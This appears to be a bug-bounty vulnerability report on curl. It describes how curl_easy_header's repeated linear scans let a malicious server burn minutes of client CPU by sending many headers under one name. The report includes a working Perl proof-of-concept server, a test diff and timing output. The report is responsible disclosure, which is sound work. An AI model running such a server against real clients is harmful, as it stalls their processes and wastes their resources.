curl_easy_header runs at O(N) or worse and can be abused to use minute(s) of CPU time

## Summary: The implementation of curl_easy_header can be abused by a malicious server that puts all headers under a single key. Imagine a server response like: ``` HTTP/1.1 200 OK a: a: a: a: [ repeat until MAX_HTTP_RESP_HEADER_SIZE bytes are used ] ``` As a developer, if you want to loop through the headers you do... (taken from tests/libtest/lib1940.c): ``` if(CURLHE_OK == curl_easy_header HEADER_REQUEST, &header)) { if(header->amount > 1) { /* more than one, iterate over them */ size_t index = 0; size_t amount = header->amount; do { curl_mprintf("- %s == %s (%u/%u)\n", header->name, header->value, (int)index, (int)amount); if(++index == amount) break; if(CURLHE_OK != curl_easy_header(easy, testdata[i], index, type, HEADER_REQUEST, &header)) break; } while(1); } else { /* only one of this */ curl_mprintf(" %s == %s\n", header->name, header->value); } } ``` Each call to curl_easy_header loops through every entry, possibly twice. First to find a count of all headers with that name, then to find the index you requested (lib/headers.c): ``` /* we need a first round to count amount of this header */ for(e = Curl_llist_head(&data->state.httphdrs); e; e = Curl_node_next(e)) { hs = Curl_node_elem(e); if(strcasecompare(hs->name, name) && (hs->type & type) && (hs->request == request)) { amount++; pick = hs; e_pick = e; } } if(!amount) return CURLHE_MISSING; else if(nameindex >= amount) return CURLHE_BADINDEX; if(nameindex == amount - 1) /* if the last or only occurrence is what's asked for, then we know it */ hs = pick; else { for(e = Curl_llist_head(&data->state.httphdrs); e; e = Curl_node_next(e)) { hs = Curl_node_elem(e); if(strcasecompare(hs->name, name) && (hs->type & type) && (hs->request == request) && (match++ == nameindex)) { e_pick = e; break; } } ``` This can add up to minutes or longer depending on hardware. I did not use AI to generate this report (ugh!) ## Affected version Currently tested with git @ 283ad5c4320fa1d733e60a0dbe216ee36e3924fb [Which curl/libcurl version are you using to reproduce? On which platform? `curl -V` typically generates good output to include] ``` ./src/curl -V curl 8.14.0-DEV (x86_64-pc-linux-gnu) libcurl/8.14.0-DEV OpenSSL/3.0.2 zlib/1.2.11 libpsl/0.21.0 Release-Date: [unreleased] Protocols: dict file ftp ftps gopher gophers http https imap imaps ipfs ipns mqtt pop3 pop3s rtsp smb smbs smtp smtps telnet tftp ws wss Features: alt-svc AsynchDNS HSTS HTTPS-proxy IPv6 Largefile libz NTLM PSL SSL threadsafe TLS-SRP UnixSockets ``` ## Steps To Reproduce: Here's a sample perl server you can hit that generates ~300k of headers all with the key of 'a' and no value: ``` #!/usr/bin/env perl use strict; use warnings; use IO::Socket qw(AF_INET AF_UNIX SOCK_STREAM SHUT_RDWR); # Just make a bunch of empty headers so we can fit as many as possible, all # with the same key: # # a: # a: # a: # a: # ... # Much more than this and curl complains: # # Too large response headers: 307204 > 307200 # my $header_count = 102_390; my $headers = join("\n", ("a:") x $header_count) . "\n"; my $hlen = length($headers); print "Using: $hlen bytes for the header with $header_count entries\n\n"; my $server = IO::Socket->new( Domain => AF_INET, Type => SOCK_STREAM, Proto => 'tcp', LocalHost => '0.0.0.0', LocalPort => 3333, ReusePort => 1, Listen => 5, ) || die "Can't open socket: $@"; print "Try http://127.0.0.1:3333\n\n"; while (1) { my $client = $server->accept(); print "Got a client\n"; # Read request and ignore my $data = ""; $client->recv($data, 1024); print "Got a request: \n\n" . $data =~ s/^/ /gmr; $client->send("HTTP/1.1 200 OK\r\n"); print "H: $hlen\n"; while ($hlen > 0) { print "Sending a chunk of headers...\n"; my $sent = $client->send($headers); unless (defined $sent) { die " Failed to send? $!\n"; } substr($headers, 0, $sent) = ""; $hlen -= $sent; print " ..sent $sent bytes\n"; } $client->send("\nhi.\n"); $client->shutdown(SHUT_RDWR); print "Responded\n\n"; # Reset these each time through $headers = join("\n", ("a:") x $header_count) . "\n"; $hlen = length($headers); } ``` You can then try it with lib1940.c if you modify it like so: ``` diff --git a/tests/libtest/lib1940.c b/tests/libtest/lib1940.c index 16e288029..9efb0934d 100644 --- a/tests/libtest/lib1940.c +++ b/tests/libtest/lib1940.c @@ -27,7 +27,7 @@ #include "memdebug.h" static const char *testdata[]={ - "daTE", + "a", "Server", "content-type", "content-length", ``` ``` $ time ./lib1940 http://localhost:3333 >/dev/null [...] Test ended with result 0 real 0m51.830s user 0m51.580s sys 0m0.214s ``` This also means curl itself is affected for anyone using `--write-out '%{header_json%}':` ``` $ time ./src/curl --write-out '%{header_json}' http://localhost:3333 >/dev/null [...] real 1m28.856s user 1m28.702s sys 0m0.116s ``` ## Impact ## Summary: It feels to me like the impact on this one is low. You'd have to get someone to hit your server with `-write-out '%{header_json%}'` or have a library using `curl_easy_header` to iterate over all values. A single request hitting this will just use up a lot of cpu for ~minute or longer depending on hardware. Unless you can force someone to make many requests and use up a lot of CPU, the damage there seems minimal. The bigger issue might be holding up things like cron jobs or other synchronous processes for far longer than they expect to be busy.

Vulnerability Details

Report Details

State

Substate

Submitted

Weakness